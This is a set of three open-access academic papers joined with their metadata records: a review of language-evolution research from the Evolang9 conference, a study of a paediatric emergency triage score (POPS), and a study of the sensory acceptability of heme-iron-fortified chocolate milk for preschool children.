GNW was furthermore rooted in the brain structure and evolution.First, neurons with longdistance connections were seen as central in cross-modules exchange.Second, modern humans' brains evolved to be more globular than our ancestors' (Neubauer & Hublin 2011, Gunz et al. 2012), thus leading to easier communication between on average spatially closer areas.No matter whether it derived from constraints linked to locomotion, bite force, cognition, and so on, according to Boeckx, the evolution of the brain shape provided easier cross-modularity.
Other contributions detailed the evolution of language in the brain and alongside other cognitive abilities.Some talks focused on non-linguistic capacities in animals, like Kazuo Fujita's search for meta-cognition (Fujita 2012), or Moore's (2012) and Froese et al.'s (2012) studies of primates' depth of analysis of others' actions, whether or not in the context of communication.As usual, coevolution enjoyed popularity, with various proposals.Invited speaker Tao Gong attempted at simulating the co-evolution of language acquisition and joint attention (Gong & Shuai 2012), while Michael Arbib (2012) and Russell Gray put forward the now classical relationship between language, gesture, and tool use.
The results of the previously mentioned PET recordings of tool-makers were particularly stressed by Gray: The manufacture of late Acheulean tools, but not of older Oldowan or even of early Acheulean tools, resulted in increased activation in areas of (i) the parietofrontal praxis circuits in both hemispheres and (ii) the right hemisphere homologue of Broca's area.The hierarchical complexity of the organization of actions in the later tools correlates with the syntactic featuresamong others recursion -of modern language.Tetsuro Matsuzawa gave an example illustrating the idea that abilities may not always get reinforced in a co-evolutionary fashion: His trade-off theory of memory and representation indeed articulates the acquisition of language and the strong decrease in eidetic imagery in humans, with the backup of experiments demonstrating the highly efficient eidetic memory of chimpanzees (Inoue & Matsuzawa 2007).
Finally, the social and cultural frame of language was considered through the prism of psychology, as well as of linguistics, animal studies or models.
At the core level of interactions, Matsuzawa insisted on the significant consequences of the differences in mother-child bonding between primates and humans.While baby primates are clinging to their mothers during the first months of their lives, early physical separations in humans allow face-to-face communication, vocal exchange, and early object manipulation.Cries in human babies are absent in primates, where the young by themselves move to reach their mothers' breasts.
At a larger scale, models tend to focus on the co-evolution of social and linguistic conventions.Models have evolved from homogeneous populations to structured yet static communities (e.g., Nettle 1999), before the introduction of more dynamical ties between agents (e.g., Gong & Wang 2005, Gong 2010).Bachwerk & Vogel (2012) presented a model with social ties continuously updated based on the success of previous interactions.Using a control parameter defining how cautious/impulsive the agents were to establish friendship (that is, reinforcing their tie with another agent) upon successive communication, the authors concluded that a high social update rate (making friends quickly and also forgetting older friends faster) paralleled sociological observations, and was very likely in early hominids, despite raising questions regarding the possibility to then build systems of conventions at a large scale.
In addition to building friendship and cooperation, the role of conflicts and competition between individuals was also considered in the emergence of language.The possibility of cooperative behavior under natural selection at the individual level has long been questioned (e.g., Axelrod & Hamilton 1981), and simulations like the previous one often leave this problem aside, although it applies to the emergence of language as a specific form of cooperation based on exchanging information.Jacob Foster elaborated on recent works on the evolution of human cooperation, emphasizing intergroup competition as a factor favoring intra-group cooperation (Boyd & Richerson 2009).He considered language in this context as a catalyst for other intra-group cooperative behaviors and an accelerator of cultural differentiation (Foster 2012).
These different studies all show that carefully consideration of social structure is necessary, both to remind of the inter-and intra-group relationships that prevailed during hominid prehistory, and to account for the specific social distributions observed today, like scale-free or small-world networks, or quantitative observations like Dunbar's (2010) number of 'relationships'.
The socio-cultural environment of our hominid ancestors was finally addressed by a few contributors, although one may consider that as in previous Evolang conferences, this line of research did not prove as present as it perhaps should be: Indeed, theories and models about languages in animals and modern humans always run the risk of diverging from the actual course of prehistory.Archeological and paleo-anthropological data are safeguards against attractive but ultimately artificial evolutionary scenarios, but they also suffer from the complex chains of inferences needed to go from often scarce material remains to behaviors and collective thinking.This was apparent in Cuthbertson & Mc-Crohon's (2012) re-reading of evidence on sea-crossings, leading them, contrary to others (Davidson & Noble 1992, Morwood & Cogill-Koez 2007), to deny the need of a sophisticated language to account for this behavior.In a similar fashion, Johansson (2012) reviewed the evidence for Neanderthal's language, building on data which lead to a variety of interpretations -likely depending on the intuitions of the scholars making use of them.A recurrent problem therefore lies in the integration of such data with other analyses of language evolution.
Future Research on the Evolution of Language
What conclusion may be drawn from the previous sections in terms of future research on the evolution of language, and can suggestions be made regarding potentially fruitful explorations?First, the experimental trend on communication/coordination games is likely to develop in the coming years and strengthen itself as a fruitful paradigm.Just as computer simulations gradually shifted from the emergence of 'simple' linguistic conventions (holistic words, vowels, word orders) to more refined linguistic constructions (say, the expression of space; Spranger & Steels 2012), we may expect future games to focus on more specific linguistic domains (Steels 2012).They will then touch more closely on the grammatical devices used in modern languages and how such devices may have emerged in the past, thus connecting to similar attempts by 'traditional' linguists (e.g., Carstairs-McCarthy 1999, 2010;Heine & Kuteva 2007).However, one may wonder if they will not meet the same difficulties as some current models: as games grow in complexity, deciphering and presenting the emerging processes at hand become difficult.As one describes a formerly unknown language, providing a synchronic description of its linguistic processes can prove daunting; adding the additional layer of com-plexity that creates diachrony and emergence often brings more issues than solves problems.
Recording 'online' brain activities as people engage in communicative activities seems another exciting avenue for research.With the simultaneous recording of several subjects, correlating synchronization at the psychological, linguistic, and neuronal levels becomes possible, which in a way opens the door to the idea of "neuro-pragmatics".
Integrating replicative archaeology and brain imagery, analyzing neural patterns of activities such as tool-making at the light of language-related brain areas also appear attractive.Tool-making and the related, precise control of motor actions are appealing in regard of the fine motor control needed for speech, but what other activities could be further studied?The Symbolic Revolution around 50,000 years before present, as observed by archaeologists in Europe and independently of its exact causes in the broader context of Homo sapiens emergence in Africa (Conard 2010, d'Errico & Stringer 2011), suggests looking at the making of more artistic and symbolic objects like anthropo-morphic or zoomorphic sculptures, for example, the ivory lion-man of Stadel-Höhle im Hohlenstein or the Venus of Hohle Fels (Conard 2009), or music instruments like flutes (Higham et al. 2012).What are the psychological and neurophysiological differences between making a tool and making a piece of art?Does an additional amount of imagination and creativity get reflected in the brain activations continuously or intermittently during the making process of the latter?Do we observe a clear distinction as between Oldowan and Acheulean, or a continuum going from purely 'functional' tools -that is, whose only goal is, say, to scrap meat, but not to carry symbolic meanings -to tools with symbolic markings to 'nonfunctional' objects like figurative sculptures?
Focusing on the neural aspects of the evolution of language also suggests addressing more closely the neurophysiology of language production and perception.Indeed, the neural bases of our communication system not only cover high-level cognitive functions, but also lower-level sensory and motor abilities that are essential and sometimes unique to our species.The neurophysiology of the emergence of speech has been addressed by some scholars (e.g., Kay et al. 1998, MacNeilage 1998, DeGusta et al. 1999, McLarnon 1999, Davis & MacNeilage 2004), though their focus has been mostly on the production.Although the issue was rather left aside during Evolang9, Shuai & Gong (2012) addressed the perceptual side by shedding some light on categorical perception, the functional lateralization of which was considered in the broader framework of language evolution (Wilkins & Wakefield 1995, Gannon et al. 1998, Cantalupo & Hopkins 2001, Botha 2003).
Departing from the preceding topics, another option for future research lies in semiotic approaches to early forms of symbolism (Coupé 2012).This line of thinking has been partially explored by palaeo-anthropologists (e.g., Henshilwood & Dubreuil 2009, Rossano 2010), but the investigations are often restricted to the surface of semiotic science -like Peirce's notions of icon, index, and symbol -and could make a better use of the typologies of signs established by semioticians (e.g., Peirce 1998, Farias & Queiroz 2003).Just as some speakers insisted on the special semiotic status of linguistic units with respect to others symbols, one could question the specificities or archaeological artifacts as signs, or investigate whether the semiotic specificities of linguistic units also apply to them.
Finally, given the emphasis on the complexity of the relationship between the genotype and the phenotype, one may look for more realistic models of biological evolution in simulations integrating biology, culture, and learning.Many results on strong or weak innate biases behind today's linguistic universals are based on rather simple -if not sometimes simplistic -models of genetic regulation.One may therefore ask whether significantly different outputs could be obtained with designs involving gene networks rather than more independent genetic units.
As a conclusion, it appears that research on the evolution of language successfully follows an integrative path when it comes to the methods and fields involved.Concepts previously designed for the sole field of modeling -like iterated learning -have met the experimental field with success.Replicative archaeology, which previously helped understand our ancestors' past behaviors (including language) has now been benefiting from brain imagery techniques.Animal studies start to apply these techniques too, as well as network analysis.Theoretical notions of the Minimalist Program are now said to find their roots in the past evolution of brain shapes.To us, this is a strong sign of the vitality of the field, whose actors already plan to meet at Evolang10 in Vienna in 2014. | 2014-10-01T00:00:00.000Z | 2013-03-22T00:00:00.000 | {
"year": 2013,
"sha1": "31ad123639276607d8ef19a310a8e46c476e7c48",
"oa_license": "CCBY",
"oa_url": "https://doi.org/10.5964/bioling.8973",
"oa_status": "GOLD",
"pdf_src": "ScienceParsePlus",
"pdf_hash": "197fe8a21a19c49d159dd1d2fb7c96d04e36acd5",
"s2fieldsofstudy": [
"Linguistics"
],
"extfieldsofstudy": [
"Computer Science"
]
} |
13852211 | pes2o/s2orc | v3-fos-license | The Paediatric Observation Priority Score : A System to Aid Detection of Serious Illness and Assist in Safe Discharge
The Paediatric Observation Priority Score (POPS) is a bespoke assessment tool for use in Paediatric Emergency Departments incorporating traditional physiological parameters alongside more subjective observational criteria. Initial performance characteristics of POPS were analysed in a convenience sample of 936 presentations to ED. Triage on the basis of gut instinct parameters identified an additional 261 patients deemed of lowest acuity compared to analysis by physiology scores. Resource consumption increased with increasing acuity on presentation. POPS shows promise in assisting in the assessment process of children presenting to Emergency Departments. Inclusion of subjective triage criteria helps contextualise the physiological parameter scoring by using the experience of staff conducting triage. Initial interpretation of presenting physiology gives a more informed assessment of initial acuity, and thus is better able to identify a child who can be safely managed in the community. The system also allows for rapid detection of those most unwell.
Introduction
Children with serious illness can be difficult to spot, especially for non-experienced staff.Healthcare systems face a challenge to select these children from an ever increasing pool of attendances to emergency and urgent care providers [1].Determining the relative acuity of children presenting to emergency and urgent care environments has traditionally been on the basis of triage.This is a time based system and does not always accurately reflect the illness or eventual disposition of the patient [2].In adult practice Early Warnings Scores (EWS) have been used to detect serious illness but there are no validated systems for children.A recent retrospective study employing ward based systems in Children's Emergency Departments (ED) demonstrated their ability to detect children requiring intensive care but not those requiring admission [3].Given the majority of children presenting to emergency or urgent care services are likely to be discharged, systems employed need to be able to assist in the determination of both the most sick and those who are well enough to go home.
Locally we created, using current evidence and the experience of senior paediatric emergency clinicians; the Paediatric Observation Priority Score (POPS).We noted the only previous work in this field by Bradman and Maconochie [4] and aimed to expand on their initial findings that an early warning score system was of limited value in predicting admission but was useful in determining discharge.POPS is a physiological and observational scoring system (range 0 -16) designed for use by health care professionals of varying clinical experience at initial assessment in an urgent or emergency care setting.
It consists of 8 domains (oxygen saturations, level of alertness, extent of breathing difficulty, background history, nurse gut feeling, heart rate, respiratory rate and temperature) each graded 0, 1 or 2 to give a total score of 16 (Appendix).Physiological sub-scores carry a total of 10 points, with gut instinct and appearance sub-scores (level of alertness, extent of breathing difficulty and gut feeling) contributing a further 6 potential points.The parameters were chosen based on APLS guidance and their utilisation in other scoring systems.The visual style was based on feedback from nurses over a 1 month period, constantly refined based on feedback.
A small pilot phase in 100 patients (presented at a regional paediatric meeting) demonstrated acceptability and feasibility.This, the first stage of an ongoing validation process, describes the initial prospective evaluation.
Methods
Leicester Royal Infirmary is a paediatric tertiary centre with a dedicated Children's ED.Since POPS was introduced in the ED, data has been collected prospectively on the demographics of attendees, their initial POPS on presentation, resource consumption in ED and eventual outcome from the department.All patients attending the paediatric ED receive initial triage assessment by a trained nurse competent in the use of POPS.
We identified the above data parameters in a randomly selected sample of patients who attended the department between 08/01/09-07/01/11.A database of 936 patients aged 0 -15 years was constructed.The initial POPS on triage was used to determine acuity on presentation to ED. Alongside total POPS, the constituent physiology and gut-instinct sub-scores were recorded for each presentation.
This database was interrogated to determine whether the inclusion of triage gut instinct parameters in POPS augment its ability to identify those patients of low presenting acuity who may be suitable for discharge home or to community care teams.The length of stay in department and subsequent ED resource consumption (imaging modality, IV access, bloods, analgesia, oxygen, nebuliser, fluid and antibiotic utilisation) was also investigated.Patient outcome in ED (i.e.discharge destination), duration of stay in department and resource consumption was therefore analysed as a function of total and constituent POPS sub-scores.The data was arranged in order of descending patient acuity as analysed by total and sub-score constituent POPS.Physiology sub-scores were grouped into narrow ranges of values.A pragmatic assumption was made that a physiology sub-score of 1 -2 out of a possible 10 is equivalent to a gut instinct sub-score of 1 out of 6, and that 3 -4 out of 10 (physiology) was equivalent to 2 out of 6 (gut instinct) and so on; such that 6 equivalent degrees of presenting acuity were assigned for physiology and gut-instinct sub-scores to facilitate comparison.A score of zero in either sub-score was deemed equivalent.
Line charts and histograms collating data for the number of presentations for each relative degree of acuity were created in the above contexts.Microsoft Excel software (2010) was used to produce all graphs.
Results
The distribution of initial triage POPS of the attendees is shown in Figure 1.32% of all patients had a POPS of 0, 37% had a POPS of 1 -2 and 21% of 3 -4.
Average duration of stay in ED for all patients was 137.2 minutes regardless of POPS and eventual outcome.Taking this into account, Figure 2 shows variation by POPS from the overall average time spent in ED.
Eventual outcome of each patient was analysed by initial POPS at time of presentation (Table 1).Included in the table below is one child who presented with a triage POPS of 12 who went to PICU (paediatric intensive care unit).This child is categorised under Children's Admissions Unit (CAU)/Ward, as it represents an admission to a hospital bed.
77.8% (185 + 47/298) of children with a triage POPS of 0 were discharged from ED. Ignoring triage POPS and taking the population as a whole; 55% of all patients were discharged home direct from ED; a figure which rises to 64% discharged from ED when those amenable to re-direction are considered.Table 2 shows outcomes as analysed by physiology and instinctive sub-scores.
Figure 3 shows that both sub-scores perform similarly in terms of predicting likely discharge disposition for a patient attending with each respective POPS score.This figure assumes that a score of zero for POPS, physiology and gut instinct are equivalent (point A), as are a score of 1 -2 for physiology and a score of 1 for gut instinct (point B) and so on.
Figure 4 shows the average number of interventions per patient in the ED; organised by way of their POPS score and eventual outcome in terms of clinical management.
Discussion
POPS provides a methodology of classifying acuity in a Children's Emergency Department which is pragmatic, supports disposition and equates to resource utilisation.In this initial validation cohort the majority of presentations were of children of low clinical acuity when analysed by POPS.69% of all attendees had a total POPS of 2 or less.
By incorporating gut instinct and appearance factors into the triage scoring of patients, we are able to expand the evidence we have to contextualise the clinical management decisions that we make.Triaging patients on the basis of their gut instinct and appearance sub-score identified an additional 261 patients of the 936 sampled who were of the lowest stratification of acuity and therefore potentially suitable for discharge from emergency care.Further work is needed to determine whether these observational characteristics can be used in isolation.
When considering duration of stay in ED (Figure 2), it is apparent that those with a total POPS score of 2 -7 appear to stay in ED for longer than the average waiting time.This may be because they are more unwell than those with lower POPS and require stabilisation, or require more investigations or assessment prior to decision making with regards to discharge disposition and outcome.It is noted those with higher total POPS scores of 8 -10 also stay in the department for less time than average.A potential explanation would be that these patients are referred efficiently if it is apparent that they require hospital admission, although the low patient numbers exhibiting this level of acuity demonstrate a need for further delineate this pattern.
It is a reasonable assumption that those patients of higher clinical acuity will require the most resources in terms of investigation and intervention.Figure 4 shows judicious use of ED investigation in those patients who are immediately re-directed to urgent care centres and other community care teams.As anticipated, those patients who are discharged from ED consume fewer resources than those who are admitted, whilst the average Table 2. Outcome of all 936 children presenting to ED by their physiology and gut instinct sub-scores of POPS.Physiology (P) sub-scores in white, out of 10.Gut Instinct (I) sub-scores in grey, out of 6.A = P0 G0, B = P1-2 G1, C = P3-4 G2, D = P5-6 G3, E = P7-8 G4, F = P9-10 G5-6.This study is of relatively old data due to the lead author undertaking a nationally funded fellowship in another research area during the years 2010-13.Results are consistent with an ongoing study [5] and another group who have utilised POPS in their own department [6].POPS remains one of the few published Emergency Department specific scoring systems [7].
Conclusions
The premise of the Paediatric Observation Priority Score is simple (POPS): it represents a bespoke method of identifying children with potentially serious illnesses while at the same time safely supporting staff in redirecting or discharging those who do not need ongoing care.This allows for the most sick and most well children to be clearly identified early in the patient journey.POPS has demonstrated a functional ability to aid health care professionals' decision making.The results of this work have led to a larger scale study (United Kingdom Clinical Research Network study number 11532) and its deployment in other centres around the United Kingdom.
With further investigation and refinement we believe POPS will reduce risk-averse strategies of referring all children of 'potential concern' for specialist paediatric assessment.This overloads an already stretched out of hours system, and leads to unnecessary hospital admissions-which is poor practice from both a resource and a patient/family care point of view, while at the same time ensuring the most unwell patients are recognised and
Figure 1 .
Figure 1.Distribution of POPS summated for all age groups of Emergency Department attendees.
Figure 2 .
Figure 2. Average time in department by POPS relative to overall average waiting time.
Figure 3 .
Figure 3. Percentage of patients discharged home from ED by their total and constituent POPS.
Figure 4 .
Figure 4. Average number of interventions per person attending ED by POPS and outcome.
Table 1 .
Outcome of 936 children presenting to the Emergency Department by their initial POPS.The urgent care centre is run by General Practitioners (Family Doctors) and indicates the child has been discharged into primary care. | 2018-04-27T21:09:57.438Z | 2016-06-13T00:00:00.000 | {
"year": 2016,
"sha1": "716a9f79eb1a5613928e3e30ce8c579da8ddb815",
"oa_license": "CCBY",
"oa_url": "http://www.scirp.org/journal/PaperDownload.aspx?paperID=67309",
"oa_status": "GOLD",
"pdf_src": "ScienceParseMerged",
"pdf_hash": "716a9f79eb1a5613928e3e30ce8c579da8ddb815",
"s2fieldsofstudy": [
"Medicine"
],
"extfieldsofstudy": [
"Medicine"
]
} |
270645136 | pes2o/s2orc | v3-fos-license | Development of iron - fortified chocolate milk for preschool children based on sensory acceptability
Milk is among the most important foods used in the daily diet of children and maybe a suitable option for fortification with minerals such as iron that help reduce iron deficiencies and anemia in children. The objective of the present investigation is to fortify with heme iron from pig blood powder, and pasteurized milk with chocolate flavor and to study its sensory acceptability in a group of children aged 3 - 5 years. The study variables in milk preparation were iron concentration and sugar content. The compound factorial design and the response optimization allowed for finding an optimal range corresponding to 25% of the recommended dose of iron for children. The formula with the highest acceptability (4.72/5) presented a concentration of 13.65 mg Fe L - 1 , 693 mg L - 1 vitamin C and 60 g L - 1 sugar. According to the physicochemical and microbiological results, the fortified flavored milk complied with regulations and had an approximate shelf life of 5 days. These results showed an alternative for heme iron fortification of chocolate milk, whose content could contribute to the daily requirement of this mineral in children aged 3 - 5 years (11 mg of iron per day for a consumption of 250 mL).
Introduction
From the physiological point of view, iron is considered a mineral of great importance for the normal development of human beings, as well as necessary for the correct functioning of the organism.The lack of iron in the body is due, in most cases, to the fact that the mineral is found in greater proportion in its ferric form, which is more difficult to absorb; in turn, the deficiency of this is also attributed to poor consumption in the daily diet (Serpa et al., 2016).On the other hand, heme iron is the biological iron that is easily absorbed by the intestinal mucous membrane cells and can be used not only as a part of iron supplements but also as an enhancer of food nutrition (Man et al., 2022).
Dairy products are poor in iron and some other minerals, so fortification with Fe would help avoid the previously mentioned nutritional deficiencies.The concentration of Fe in milk is around 0.2 mg kg -1 , therefore adding Fe to this product can favor the daily intake of this nutrient.Parameters for evaluating the effects of iron added to dairy products include fat oxidation, flavor, shelf life and microbial physiology, sensory quality, and general acceptance of the fortified product (Gahruie et al., 2015).Some research details that fat oxidation in chocolate milk fortified with ferric polyphosphate whey protein complex was avoided and showed an acceptable taste (Douglas et al., 1981).However, fortification with ferric chloride or ferrous gluconate was not acceptable and ferric ammonium citrate increases oxidation in milk (Gahruie et al., 2015).Due to the above, it is necessary to find a balance between the incorporation of iron (and its forms), as well as sensory acceptability.
Among the various techniques used for sensory analysis, affective tests are used with the purpose of evaluating consumer preference and/or acceptance with respect to products (Navarro et al., 2013).The illustrated face scales show a spectrum of sensory experiences, thus RESEARCH PAPER eliminating the need for raters to quantify their experience numerically.For example, when these are children (Garra et al., 2010).These sensory and hedonic methods have been applied with the purpose of optimizing food to develop healthier options that are liked by children (Laureati et al., 2015).
Among the investigations of sensory evaluation of fortified milk drinks is a chocolate drink with hydrolyzed lactose (50%) and enriched with amino-chelated iron such as iron bisglycinate at 5% of the RDI (recommended daily intake), which obtained good sensory acceptability in a sensory ordination test that was carried out with 7 trained judges.It was also concluded that iron bisglycinate affected the color property, which limited its use in chocolate milk beverages (Hernández, 2017).On the other hand, Villalpando et al. (2006) evaluated the efficacy of whole cow's milk fortified with ferrous gluconate and zinc oxide, along with ascorbic acid, to improve iron status in children 10 to 30 months of age.The prevalence of anemia decreased from 41.4 to 12.1% (P < 0.001) after 6 months and the results could lead to expanding a subsidized fortified milk distribution program to 4.2 million beneficiary children aged 1 to 11 years old in Mexico.Recently de Matos et al. (2021) developed a fermented drink, replacing milk with whey, adding mangaba pulp (Hancornia speciosa Gomes) and iron, to improve the nutritional quality of the products.The work highlighted the contribution of proteins, calcium and iron to the daily value of recommended intake of formulations, 8.4%, 15.2% and 44.3%, respectively, and the increase in serum concentration in the formulation improved acceptability, ranking 91.5% for children and 73.6% for adolescents.
In a previous investigation, heme iron was used, establishing as variables the concentration of iron and chocolate, which influenced the acceptability of fortified milk (García et al., 2022).This was appreciated in children between 8 and 11 years old, presenting the highest acceptability from 6.76 mg Fe kg -1 (6.4-12.8mg Fe kg -1 ) and 2.0 g kg -1 (2-4 g kg -1 ) of chocolate.The iron content represented approximately 21% of the recommended dose for children in this age range (8 mg Fe/day, with a consumption of 250 g of milk).For this reason, it is also necessary to evaluate other parameters that can influence sensory acceptability for children in other age ranges and that have a higher iron content that contributes to improving iron deficiencies in the daily diet.
Therefore, this study aimed to identify the ideal composition of heme iron-fortified chocolate flavored milk samples, based on a central composite design by analyzing iron and sugar concentration levels with respect to their sensory acceptability appreciated by a group of children between 3 and 5 years old measured in a hedonic scale facial test and its subsequent physicochemical and microbiological characterization.
Materials
Homogenized milk from the Milk Pilot Plant of La Molina National Agrarian University.Whole blood powder of pig origin Aprosan TM (188 mg Fe per 100 g of product), alkalized cocoa powder, ascorbic acid, carrageenan, liquid vanilla, cinnamon, aniseed, clove, commercial sucrose and chocolate bit of Frutarom Peru S.A. Food additives were food grade.
Iron-fortified chocolate milk
Iron-fortified chocolate flavored milk was prepared based on the Peruvian Technical Standard NTP 202.189.2020(INACAL, 2020), using fresh milk, commercial sucrose, flavorings, ascorbic acid and authorized additives.Aprosan TM powder was completely diluted in cold milk at 10°C, then heated to 30°C, and subsequently cinnamon, cloves and anise were added.Heating continued up to 50°C, where sugar, cocoa, carrageenan and vitamin C were added and after that vanilla and chocolate were added at 60°C.The product was pasteurized under Low Temperature and Long Time (LTLT), at 72°C for ten minutes, using a stainless steel 100 L jacketed pot.Subsequently, the iron-fortified chocolate flavored milk was filtered to retain the remaining clove, cinnamon and anise residues.Finally, milk was bottled in 250 mL plastic bottles and stored at room temperature.Table 1 shows the ingredients used in the formulation of chocolate milk and their respective amounts.
Experimental design
The central composite design was used to investigate the effects of heme iron and sugar concentrations to determine the optimum formulations.Three concentration levels (low, medium and high) were evaluated as variables, for nine formulations included in ) and the high level 30% fortification (13 mg L -1 ), for 1 L of milk.The sugar levels were chosen based on the concentration of 50 g of sugar per liter provided in Law No. 30021, Law for the Promotion of Healthy Eating (El Peruano, 2017).The low level of sugar represents 50 g L -1 , the intermediate level 55 g L -1 and the high level 60 mg L -1 , for 1 L of milk.
Sensory analysis
The facial hedonic scale test was performed on a total of 120 preschoolers, aged 3-5 years, untrained users, from a public school in the city of Lima, Peru.They were asked to rate their overall acceptability on a 5 -point hedonic scale (1 = I dislike a lot, 2 = I dislike, 3 = I don't like or dislike, 4 = I like, 5 = I like it a lot).
Children were asked to mark the facial image that best represented how much they enjoyed each product (Figure 1).A 5-point hedonic facial scale was chosen because it has been reported to be applicable in children of the same age range (Chen et al., 1996), furthermore, it is recommended to use hedonic scales with words only with children older than 8 years old (Laureati et al., 2015).Some researchers show the advantage of using facial images from a nonverbal approach that conveys meaning and evaluates children's emotional responses to food products, which makes them feel more comfortable with their use (da Cruz et al., 2021).
The overall acceptability value for each formulation was obtained from the sum of the children's acceptability, divided by the number of children surveyed.
Statistical analysis
The results of the sensory analysis of the formulations obtained by the central composite design were subjected to an analysis of variance (ANOVA) using the software Minitab Version 17 to determine the significance of the coefficients in the model at a confidence level of 95% (p < 0.05).The model fit was verified using the R 2 value.The most accepted formulation was then used in the preparation of the fortified flavored milk for its subsequent characterization.Analysis of variance (ANOVA) is an optimal and well-known statistical tool for comparing products, and sensory acceptance data is generally evaluated using this analysis.Sensory acceptance is a parametric test and presents assumptions to be validated, such as the homogeneity of the residual variance (Navarro et al., 2013).
Milk characteristics
Physicochemical characterization was carried out for fresh milk and fortified flavored milk based on Peruvian technical regulations.The protein analysis was carried out by the Kjeldahl total nitrogen determination method (NTP 202.119: 1998(NTP 202.119: -2014) ) (INACAL, 1998a).The amount of total solids and ash content were obtained based on NTP 202.118:1998-2021and NTP 202.012:2008-2018, respectively (INACAL 1998b, 1998c).Viscosity was determined using a Brookfield viscometer.The fat analysis was determined by the Weibull-Berntrop gravimetric method (ISO 8262, 2005) and iron was analyzed according to AOAC 985.35 (AOAC, 2016).Vitamin C was analyzed by titration method according to AOAC 985.33 (AOAC, 2016a).The determination of the mesophilic aerobes and coliform was carried out based on ICMSF (2000).Table 2. Variables and levels used for the experimental design.
Fortification for 1 L of milk (Recommended dose, 11 mg Fe per day for a portion of 250 g of milk).
Sensory analysis
The acceptability of the fortified flavored milk was evaluated by sensory tests.According to the results (Figure 2), the highest acceptability was attributed to the F3 formulation milk sample and the lowest score was attributed to the F6 sample.In general, all the formulations had a range of appreciation between I like it and I like it very much.The higher score (4.72) was attributed to a lower concentration of iron (11 mg L -1 ) and a higher amount of sugar (60 g L -1 ), probably associated with the fact that a less metallic taste and a greater amount of sugar are more appreciated by children.The greater preference for sugar during infancy may be related to the rapid physical growth during this time (Forestell, 2017).
Statistical analysis
The analysis of variance (ANOVA) for the significance test of the model coefficients is shown in Table 3, where the factors and their combinations were: factor X1: iron concentration and factor X2: sugar concentration.The analysis indicates that the quadratic effect of the concentration of iron (X 1 ) and sugar (X 2 ) are the factors with the greatest significance (p < 0.05).According to the dimension of these coefficients in the model, the two variables (X 1 *X 1 and X 2 *X 2 ) are determinants of the sensory acceptability of fortified flavored milk.
The adjustment of the model for sensory acceptability (SA), resulting from the exclusion of nonsignificant terms (p > 0.05) is presented in Equation 1.The R 2 value of 0.650 indicates the efficiency of the model.The response optimization process found optimal values for the factors and sensory acceptability: Fe concentration = 11 mg Fe L -1 sample, sugar concentration = 60 g L -1 and SA = 4 .72(scale from 1 to 5), under a confidence level of 95%.These concentrations coincide with the formulation (F3) with the highest score in the sensory test.
Figure 3a shows the development of the response surface, where the optimal combinations of factors, both individual and their interactions, were found.The objective is to maximize the score parameter that represents the desirability function.The desirability RESEARCH PAPER function evaluates whether the combination of factors satisfies the goals defined for the responses.In this case, the desirability function (0.8046) is close to 1, indicating that the predicted combination of factors would achieve the optimal score.Therefore, the model indicates that the best score is obtained with an iron concentration of 25% of the RDA (11 mg L -1 ) and a sugar concentration of 60 g L -1 of milk; obtaining an average score of 4.72.
In addition, the contour plot for overall acceptability as a function concentration of iron and sugar is shown in Figure 3b, which also indicates a general acceptability greater than 4.70 for a formulation of 11 mg L -1 of iron and 60 g L -1 of sugar.
Under this iron concentration, chocolate-flavored fortified milk can supplement a percentage of the recommended levels for children 3 to 5 years old (11 mg of iron/day) if 250 g of milk is consumed (Institute of Medicine (US), 2001) and also represents milk with desirability for children of these ages according to the optimized sugar level.
Milk characteristics
Flavored milk must meet certain physicochemical and microbiological requirements according to the Peruvian Technical Standard NTP 202.189.2020(INACAL, 2020), for this its physicochemical parameters were evaluated (Table 4).The protein content of fortified flavored milk was higher than that of fresh milk and on the contrary for fats, the content was lower for fortified milk.The viscosity value 4.43 cP can also be influenced by the addition of carrageenan (Yanes et al., 2002).
The concentration of Vitamin C (0.693 g L -1 ) coincides with the amount added for fortified milk (0.70 g L -1 ).The addition of Vitamin C favors the absorption of heme and non-heme iron in fortified milk formulations and in other foods eaten by children (FAO and WHO, 2002).
The iron concentration of fresh milk and iron-fortified milk is 13.65 mg Fe L -1 and <0.5 mg Fe L -1 , respectively.This value represents 3.4 mg of iron in 250 mL, which is within the daily requirement parameters for said mineral in preschool children (11 mg of iron/day) if they consume 250 g of milk per day (Institute of Medicine (US), 2001).The content of incorporated iron is also related to the metallic taste, since at very high concentrations this taste can be appreciated (Toldrà et al., 2011).This research worked with formulations with concentrations that contribute to nutritional quality but at the same time have optimal general acceptability.
According to Villalpando et al. (2006), the iron content is similar with 5.8 mg/400 mL of iron as ferrous gluconate, 5.28 mg/400 mL of zinc as zinc oxide, and 48 mg/400 mL of ascorbic acid assigned to children between 10-30 months of age.Ferrous gluconate added to whole cow's milk as a fortifier along with ascorbic acid was effective in reducing the prevalence of anemia and improving iron status in children.On the other hand, Gupta et al. (2015) prepared microcapsules of iron from salts and incorporated them into a mixture of cow and buffalo milk, obtaining concentrations of 25 mg L -1 of iron, which is higher than that obtained in this investigation.
According to NTP 202.189.2020(INACAL, 2020) regarding the microbiological requirement of flavored milk, the number of coliforms must be below 3 MPN and the number of mesophilic aerobes must not exceed 50,000 CFU mL -1 .For this work, after 14 days, the recommendation in the number of coliforms is met, only that the number of mesophilic aerobics exceeds 50,000 CFU mL -1 at 5 days (Table 5).Thus, its consumption is recommended before 5 days.
According to the nutritional information of two national commercial chocolate milks, these present a total sugar content of 4.9 and 9.0 g per 100 mL, respectively; additionally, these contain added sugars and sweetener additives.In addition, Nutrition Facts labels omit claims of vitamin C or iron content.indication of an advertising warning sign in the form of an octagon if the sugar content in beverages is greater than or equal to 5 g per 100 mL.Since the optimal formula exceeded this content, it would be necessary to indicate the advertising label or carry out a study on the incorporation of sweeteners in the future that produces a balance between acceptability and the amount of sugar below the limit according to the Law No. 30021 above mentioned.
These results show a method of fortifying flavored milk that enables the technological use of heme iron as a nutrient extender in the production of dairy products, since it complements the daily requirement of said mineral in children between 3-5 years of age.
Conclusion
The concentration of iron and sugar has a significant effect on the sensory acceptability of chocolate-flavored milk intended for children aged 3-5 years, obtaining a greater acceptance for 25% (11 mg L -1 ) of the recommended dose of iron for children in this age range (11 mg for a portion of 250 mL per day) and a sugar content of 60 g L -1 .Fortified flavored milk has physicochemical and microbiological characteristics similar to flavored milk, complying with the range established by the Peruvian technical standard.The useful life is influenced by the number of mesophilic aerobics, which exceeds the values recommended by regulations in a period of 5 days.The results of this study revealed the potential of iron fortification from blood powder in chocolate milk formulation and its use in infant feeding programs.
Figure 1 .
Figure 1.Sensory evaluation sheet of fortified chocolate milk used in pre-school children.
Figure 3. (a) Response surface plot and (b) Contour plot for overall acceptability as function of concentration of iron and sugar.
Table 4 .
